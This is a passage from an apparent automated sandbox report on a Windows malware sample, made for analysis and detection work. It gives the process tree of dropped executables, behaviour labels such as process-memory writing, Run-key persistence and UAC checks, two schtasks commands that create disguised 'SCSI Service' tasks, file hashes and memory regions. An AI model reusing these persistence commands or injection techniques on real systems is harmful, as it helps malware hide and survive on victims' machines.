- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Users\Admin\AppData\Roaming\ammero.exe"C:\Users\Admin\AppData\Roaming\ammero.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SCSI Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9D3B.tmp"7⤵
- Creates scheduled task(s)
PID:2888 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SCSI Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9DB9.tmp"7⤵
- Creates scheduled task(s)
PID:3396
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
C:\Users\Admin\AppData\Local\Temp\tmp9D3B.tmpMD5
f7eb19c49b51cdff67a25c6876a78241
SHA16d86be501c2fb57b50292a55d3983b7eee8a688d
SHA256c9dab73a0044021d2acbc3952b19dea98cdfd838afc633197bd1bd12d2562fba
SHA5121e94e363f9d4d0dcdfe0a8457642fcfe4f81dff0b39f1d1f00deab9291e133cd40b48c097dfe52c356d4a15c383e0aa08fae28b136937bcc57d5e01861716740
-
C:\Users\Admin\AppData\Local\Temp\tmp9DB9.tmpMD5
4e71faa3a77029484cfaba423d96618f
SHA19c837d050bb43d69dc608af809c292e13bca4718
SHA256c470f45efd2e7c4c5b88534a18965a78dce0f8e154d3e45a9d5569ad0e334bdb
SHA5126d014de41352f2b0b494d94cd58188791e81d4e53578d0722110b6827793b735e19c614877f25c61b26233dea1b5f1998ba1240bdc8fa04c87b7e64a4ca15fe0
-
C:\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
C:\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
C:\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
C:\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
memory/588-262-0x0000000000000000-mapping.dmp
-
memory/712-271-0x00000165A59C0000-0x00000165A59C2000-memory.dmpFilesize
8KB
-
memory/712-390-0x00000165A5CF0000-0x00000165A5CF1000-memory.dmpFilesize
4KB
-
memory/712-273-0x00000165A59C3000-0x00000165A59C5000-memory.dmpFilesize
8KB
-
memory/712-274-0x00000165A5980000-0x00000165A5981000-memory.dmpFilesize
4KB
-
memory/712-277-0x00000165A5C50000-0x00000165A5C51000-memory.dmpFilesize
4KB
-
memory/712-350-0x00000165A5BF0000-0x00000165A5BF1000-memory.dmpFilesize
4KB
-
memory/712-386-0x00000165A59C6000-0x00000165A59C8000-memory.dmpFilesize
8KB
-
memory/712-267-0x0000000000000000-mapping.dmp
-
memory/712-398-0x00000165A59C8000-0x00000165A59C9000-memory.dmpFilesize
4KB
-
memory/1136-436-0x0000000000000000-mapping.dmp
-
memory/1236-452-0x0000000000000000-mapping.dmp
-
memory/1236-456-0x00000000009A0000-0x00000000009A1000-memory.dmpFilesize
4KB
-
memory/1236-461-0x0000000005190000-0x000000000568E000-memory.dmpFilesize
5.0MB
-
memory/1236-480-0x0000000005630000-0x0000000005631000-memory.dmpFilesize
4KB
-
memory/1820-439-0x0000000000000000-mapping.dmp
-
memory/1820-447-0x0000000005560000-0x0000000005A5E000-memory.dmpFilesize
5.0MB
-
memory/1820-459-0x0000000009E40000-0x0000000009E41000-memory.dmpFilesize
4KB
-
memory/1820-454-0x0000000007810000-0x000000000781B000-memory.dmpFilesize
44KB
-
memory/1820-451-0x0000000005560000-0x0000000005A5E000-memory.dmpFilesize
5.0MB
-
memory/2276-118-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-116-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-115-0x00007FF619670000-0x00007FF61CC26000-memory.dmpFilesize
53.7MB
-
memory/2276-117-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-122-0x00007FFB500F0000-0x00007FFB511DE000-memory.dmpFilesize
16.9MB
-
memory/2276-496-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-497-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-119-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-498-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-123-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2276-124-0x00007FFB4E1F0000-0x00007FFB500E5000-memory.dmpFilesize
31.0MB
-
memory/2276-499-0x00007FFB2F800000-0x00007FFB2F810000-memory.dmpFilesize
64KB
-
memory/2888-472-0x0000000000000000-mapping.dmp
-
memory/2964-462-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2964-479-0x0000000006290000-0x0000000006293000-memory.dmpFilesize
12KB
-
memory/2964-478-0x0000000005200000-0x00000000056FE000-memory.dmpFilesize
5.0MB
-
memory/2964-463-0x000000000041E792-mapping.dmp
-
memory/2964-477-0x0000000006170000-0x0000000006189000-memory.dmpFilesize
100KB
-
memory/2964-471-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/2964-476-0x0000000005480000-0x0000000005485000-memory.dmpFilesize
20KB
-
memory/3396-474-0x0000000000000000-mapping.dmp
-
memory/3768-430-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/3768-431-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB
-
memory/3768-429-0x0000000005250000-0x0000000005251000-memory.dmpFilesize
4KB
-
memory/3768-427-0x0000000000240000-0x0000000000241000-memory.dmpFilesize
4KB
-
memory/3768-399-0x0000000000000000-mapping.dmp
-
memory/3768-433-0x0000000002620000-0x0000000002641000-memory.dmpFilesize
132KB
-
memory/3768-438-0x00000000025A0000-0x0000000002632000-memory.dmpFilesize
584KB
-
memory/3768-432-0x00000000025A0000-0x0000000002632000-memory.dmpFilesize
584KB
-
memory/3768-435-0x0000000005EB0000-0x0000000005EB1000-memory.dmpFilesize
4KB
-
memory/3768-434-0x0000000005EF0000-0x0000000005EF1000-memory.dmpFilesize
4KB
-
memory/3812-437-0x0000000000000000-mapping.dmp